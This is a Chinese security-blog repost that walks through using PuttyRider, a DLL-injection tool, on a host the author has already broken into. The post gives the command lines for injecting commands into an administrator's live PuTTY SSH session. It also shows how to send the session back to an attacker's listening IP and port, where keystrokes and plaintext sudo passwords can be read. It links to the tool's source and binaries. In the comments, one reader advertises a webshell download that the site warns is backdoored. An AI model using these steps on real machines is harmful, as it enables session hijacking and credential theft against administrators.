Putty的噩梦 — 渗透工具PuttyRider使用心得分享

admin 2021年4月2日20:28:09评论127 views字数 1327阅读4分25秒阅读模式

Putty的噩梦——渗透工具PuttyRider使用心得分享

我们在入侵到一台主机的时候,经常会看到管理员的桌面会放着putty.exe,这说明有很大的可能性管理员是使用putty远程管理主机的。该工具主要是针对SSH客户端putty的利用,采用DLL注入的方式,来实现各种猥琐的利用姿势。我依次演示该工具的三种利用场景

1.当你远程控制对方主机的时候,管理员正好用putty连接着远程主机

这种情景,我们只要直接注入命令到当前的putty进程,就可以利用,非常简单,缺点是没有回显。

使用puttyRider.exe –l 查看当前进程中putty正在连接的远程主机信息,这里不光能得到远程主机的IP地址和putty进程号,还能在Injected列看到当前是NO,说明我们还没有进程注入。

我们使用puttyrider.exe –p 0 –f –c ifconfig,就把ifconfig命令注入到当前的putty会话了,就达到远程命令执行的目的了。再次puttyRider.exe –l 看一下,发现injected列是yes了,说明我们注入进程成功了。

2.使用反弹的方式实时看管理员的输入

除了利用第一种方法直接注入命令,我们还可以反弹出来,实时看到对方管理员在putty里的输入,即使管理输入sudo这种命令,我们也能够看到他输入的明文密码。但是这种利用的前提是,对方管理员正在用PUTTY连接的主机可以反弹到你监听的IP地址,防火墙限制的不是很严。

Puttyrider.exe –p 0 –r 我监听的IP:端口

执行后,我们就可以看到结果了

3.我运气不这么好,对方管理员当前没有正在使用PUTTY管理远程主机

这种情况应该最常见了,软件作者也考虑到了,给我们提供了-w参数,他会让puttyrider后台监视新起来的进程,然后反弹到我们的主机,也能实时的看到对方的操作哦,包括输入的账号。

Puttyrider.exe –w –r 我监听的IP:端口号

当执行完这个命令后,只要管理员下次再次开启PUTTY的时候,我们就能在监听的9999端口看到她的SHELL了

最后如果想研究工具细节的童鞋,可以在

https://codeload.github.com/seastorm/PuttyRider/zip/master下载源码,深入学习 :)

编译好的二进制文件可以在

https://github.com/seastorm/PuttyRider/releases/download/0.1/PuttyRider-bin.zip下载

留言评论(旧系统):

Helen @ 2014-12-16 02:38:09

分享一个最近很火的匿名者黑客asp大马!
下载地址:
[color=Red]http://pan.baidu.com/s/1g****O3[/color][/size][/b]

本站回复:

站长提示:额,自带后门的大马,请勿下载!请勿使用!

flowind @ 2014-12-19 00:35:28

国内下载的Putty很多都自带后门...
以至于现在连接ssh很少有人用这个了 虽然很小巧.

本站回复:

是的,尤其是之前爆出大规模后门事件以后。

文章来源于lcx.cc:Putty的噩梦 — 渗透工具PuttyRider使用心得分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:28:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Putty的噩梦 — 渗透工具PuttyRider使用心得分享http://cn-sec.com/archives/317436.html

发表评论

匿名网友 填写信息